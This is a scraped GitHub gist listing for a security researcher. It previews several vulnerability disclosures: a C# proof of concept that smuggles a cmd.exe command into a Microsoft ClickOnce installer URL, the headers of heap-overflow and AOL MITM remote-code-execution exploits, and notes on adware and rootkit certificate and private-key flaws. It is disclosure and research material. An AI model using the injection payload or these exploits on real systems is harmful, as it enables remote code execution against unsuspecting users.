Skip to content

Instantly share code, notes, and snippets.

slipstream/RoL Wack0

Block or report user

Report or block Wack0

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Wack0
Wack0 / programmatic_poc.cs
Last active Dec 14, 2016
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
View programmatic_poc.cs
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
@Wack0
Wack0 / 86box-td0.php
Last active Mar 20, 2018
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) Code Execution PoC
View 86box-td0.php
<?php
/*
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) can cause code execution
calc.exe PoC for both builds (the x86 AMD and Intel binaries!)
a *Ring of Lightning* production by slipstream/RoL!
Please note that due to lack of available hardware, exploitation of the AMD binaries has not been tested.
So you may have to fix that yourself.
86Box is a fork of PCem maintained by Battler aka Tenshi aka Kiririn/RoL.
@Wack0
Wack0 / adwareroi.md
Last active Apr 21, 2016
AdwareROI MiTM certificates and private keys
View adwareroi.md

AdwareROI

AdwareROI is basically the world's shittiest MiTM malware ever.

It's being sold for $5.5k for one panel/binary, $16k for multiple panels/binaries, and probably ten times that if you want src too. That doesn't include the SSL MiTM functionality which is another $1k.

And.. as I said, it's shitty. The MiTM functionality relies on WinDivert, the SSL MiTM uses a custom component, which is (seriously!) called mitm_test_poc. And it uses a hardcoded CA cert and private key, that's installed with the other components.

So, what to do but disclose these as I obtain them?

@Wack0
Wack0 / 1-torrents-time-certs-keys.md
Last active Apr 13, 2018
Torrents Time bundles certificates and private keys.
View 1-torrents-time-certs-keys.md

Torrents Time bundles certificates and private keys

So, with all the news about how Torrents Time is insecure.. I figured I might as well reverse it.

It seems to have three components, one (on windows) is a native service (TTService.exe) that runs as SYSTEM, another (TTPlayer.exe) runs under a lower privileged user. There's also a nodejs application, server.js.

The native service seems to set up a localhost HTTPd, on either port 12400, 11400, 10400 or 9400, using whichever is open.

So, I browsed to it, and was astonished to discover it was running with TLS, and gave the browser a valid certificate, signed by Thawte! (the cert was issued to localhost.ttconfig.xyz, obviously to work around new CA rules. For the record, it currently resolves to 127.0.0.1 as you'd probably expect.)

@Wack0
Wack0 / ayy-oh-lmao.js
Last active Dec 8, 2015
AOL Desktop <= 9.8.1 FS Read/Write via MITM, <= 9.8.0 Remote Command Execution via MITM PoC
View ayy-oh-lmao.js
/*
ayy-oh-lmao.js
AOL Desktop <= 9.8.0 File Write and Remote Command Execution via MITM
AOL Desktop <= 9.8.1 File Write via MITM.
by slipstream/RoL, between August and December 2015.
irc.rol.im #rol ** http://rol.im/chat/ ** twitter @TheWack0lian
The custom AOL protocol, includes a scripting language called FDO91 (FDO), that's compiled into a bytecode.
Compiled FDO makes up part of the data sent from server to client and client to server.
@Wack0
Wack0 / gist:bda47c2bfadfb68d73ea
Created Jul 29, 2015
Cards against Security: list of all cards
View gist:bda47c2bfadfb68d73ea
Database: heroku_1ed5a148e6d9415
Table: black_cards
[16 entries]
+----+--------------------------------------------------------------------------------------------------------------+
| id | content |
+----+--------------------------------------------------------------------------------------------------------------+
| 1 | _____ means never having to say you're sorry. |
| 2 | The pen tester found _____ in the trash while dumpster diving. |
| 3 | Our CIO has a framed a picture of _____. |
| 4 | 9 out of 10 experts agree, _____ will increase your security effectiveness. |
@Wack0
Wack0 / gist:f865ef369eb8c23ee028
Last active May 9, 2018
Komodia rootkit findings by @TheWack0lian
View gist:f865ef369eb8c23ee028

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this..

The Komodia rootkit config is located in a certain registry entry that's hardcoded in the driver. For Qustodio, it's HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qwd\Data.

The config structure is simple enough. An array of the following structure:

DWORD type;
BYTE unknown[32]; // I don't see anywhere that the driver actually *reads* any of this part,
                  // at least, not after writing to it first.
@Wack0
Wack0 / gist:17c56b77a90073be81d3
Last active Mar 6, 2018
It's not just superfish that's the problem.
View gist:17c56b77a90073be81d3
Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.
Superfish isn't the only product to use that sdk. there's others too.
Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
key pair. Seems a lot of people think they all use the superfish cert. That is
NOT the case.
First thing I checked was komodia's own parental control software,
Keep My Family Secure. (mentioned on komodia's own website).
You can’t perform that action at this time.